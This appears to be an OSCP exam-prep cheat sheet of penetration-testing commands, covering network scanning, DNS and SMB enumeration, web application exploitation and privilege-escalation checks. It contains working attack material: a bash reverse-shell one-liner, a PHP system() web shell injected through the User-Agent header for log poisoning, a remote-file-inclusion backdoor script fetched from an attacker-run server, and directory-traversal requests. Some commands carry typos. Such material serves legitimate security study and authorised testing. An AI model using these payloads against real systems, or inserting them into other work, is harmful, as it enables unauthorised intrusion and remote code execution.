OSCP Commands Cheat Sheet

Information Gathering

1. Network Scanning

Nmap:

// Stealth scanning
sudo nmap -sS <target>

// Full TCP connection is made
nmap -sT <target>

// UDP scan
nmap -sU <target>

// Network sweeping
nmap -sn 192.168.100.1-253 -oG sweep.txt
grep Up sweep.txt | cut d " " -f 2

nmap -p 80 -sn 192.168.100.1-253 -oG web-sweep.txt
grep open web-sweep.txt | cut d " " -f 2

// OS scan
nmap -O <target> --osscan-guess

// Scan with NSE script
nmap --script http-headers <target>
nmap --script-help http-headers

-A: OS version detection, script scanning, and traceroute
--top-ports=n: Scan top n ports (decided by the file in /usr/share/nmap/nmap-services)

Netcat:
```
nc -nvv -w 1 -z <target> <port-range>
```
-w: set the connection timeout in seconds
-z: set zero I/O mode
```
// UDP Scan
nc -nv -u -z -w 1 <target>
```
-u: UDP scan

On Windows:

// Port scan
Test-NetConnection -Port 445 <target>

// Port sweeping
foreach ($port in 1..1024) {if (($a=Test-Connection <target&rt; -Port $port -WarningAction SilentlyCongiue).tcp TestSucceeded -eq $true){"TCP port $port is open"}}

2. Enumeration

DNS Enumeration:
```
host <target-domain>
host -t <query type> <target-domain>
```
Common query types:
A → IPv4 address
AAAA → IPv6 address
CNAME → Canonical name (alias)
MX → Mail exchange servers
NS → Name servers
PTR → Reverse lookup (IP to domain)
SOA → Start of Authority (DNS zone nformation)
TXT → Text records (e.g., SPF, DKIM, etc.)
SRV → Service records
CAA → Certification Authority Authorization
```
// list.txt contains a candidate list of subdomains
for ip in $(cat list.txt); do host $ip.example.com; done
                    
// Search by IP addr
for ip in $(seq 200 245); do host 52.10.10.$ip; done | grep -v "not found"
```
```
dnsrecon -d <target-domain> -t std
dnsrecon -d <target-domain> -D ~/list.txt -t brt
```
list.txt: possily contains a list of candidate subdomain names such as www, ftp, mail, proxy, etc.
brt: stands for a brute force
```
dnsenum <target-domain>
```
SMB Enumeration
```
nmap -v -p 139,445 -oG smb.txt 192.168.50.1-254
cat smb.txt

// Using NSE script
ls -l /usr/share/nmap/scripts/smb*
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.132
```
```
// Specific to identifying NetBIOS information
sudo nbtscan -r 192.168.50.0/24
```
On Windows, enumerate SMB shares within the environment:
```
net view \\<hostname> /all
```
It lists all the shares running on the hostname.
Normally it works well in AD environment, but still avaible in workgroup setting (with some degree of limitations).
In recent Windows system, NetBIOS over TCP/IP and/or SMBv1 are disabled and hence 'net view' command may not deliver any information.
Enum4linux:
```
enum4linux -a <target>
```
SMB Client Listing:
```
smbclient -L <target> -U username
```

3. Vulnerability Scanning

Nmap Vuln Scanning with NSE:
```
// NSE script with "vuln"
sudo nmap -sV -p 443 --script "vuln" 192.168.100.2
```
Using specific CVE NSE Script
1. Search for the CVE NSE script on internet
2. Download the script and save it on /usr/share/nmap/scripts
3. Update the NSE DB:
  sudo nmap --script-updatedb
4. Give the CVE NSE file as an argument:
  sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.100.2

Exploitation

Some useful info in general:

SSH priv_key location: /home/<username>/.ssh/<priv_key file>
Reverse shell

nc -nvlp 4444

// Bash shell
bash -i >& /dev/tcp//4444 0>&1

// Bourne Shell
bash -c "bash -i >& /dev/tcp//4444 0>&1"

1. Exploitation on Web Application

Some useful info on web application attack:

Sending json data using curl

curl -d '{"username":"admin","password":"fake"}' -H 'Content-Type:application/json' http://192.168.50.132:80/users/v1/login

Sending via PUT method

curl -X 'PUT' ...
		  Apache web server log: /var/log/apache2/access.log
On Windows, the log file is located in application-specific paths: (If target runs Apache under XAMPP) C:\xampp\apache\logs\

Nmap

sudo nmap -p 80 -sV <target>
sudo nmap -p 80 --script=http-enum <target>

GoBuster

Directory brute force

gobuster dir -u <target> -w /usr/share/wordlists/dirb/common.txt -t <# of threads>

Abusing APIs (Use the fact that API often includes version number)

// Prepare a pattern file
cat pattern
{GOBUSTER}\v1
{GOBUSTER}\v2

gobuster dir -u http://192.168.50.132:80 -w /usr/share/wordlists/dirb/big.txt -p pattern

// Assuming /users/v1 is discovered
curl -i http://192.168.50.132:80/users/v1

// Further enumerate if applicable
gobuster dir -u http://192.168.50.132:80/users/v1/<username>/ -w /usr/share/wordlists/dirb/small.txt

BurpSuite (Repeater/Intruder)
- HTTP Packet inspection
- Brute force attacks
Debugging page inspection
- Source code (Debugger/Inspector)
- HTTP response headers (Network)
- robots.txt
XSS
Tips:
- Look for unsanitized input characterers typically with: < > ' " { } ;
- Mostly web applications use HTML/URL encoding
Directory Traversal
- URL encoding of a dot (.) is %2e
- Look for vulnearable parameters and directories

File Inclusion

Local File Inclusion

Log Poisoning: See what client information is recorded and change those information using BurpSuite

// e.g. Modifying User Agent
User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>

// Execute the command recorded in the log
curl -i http://192.168.50.132:50/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=ls%20-al

Use bypass filters when it's PHP application:

php://filter
data://

Remote File Inclusion

// Sample code (sample-backdoor.php)
if(isset($_REQUEST['cmd'])){
	echo "<pre>";
	$cmd=($_REQUEST['cmd']);
	system($cmd);
	echo "</pre>";
	die;
}
?>

// Run web server
python3 -m http.server 80

// Exploit
curl "http://192.168.50.132:80/index.php?page=http:///sample-backdoor.php&cmd=ls"

File Upload
- Using executable files

Post-Exploitation

Privilege Escalation Enumeration:
```
./linpeas.sh
```
Search for SUID Files:
```
find / -perm -4000 2>/dev/null
```
Check Active Network Connections:
```
netstat -tulpn
```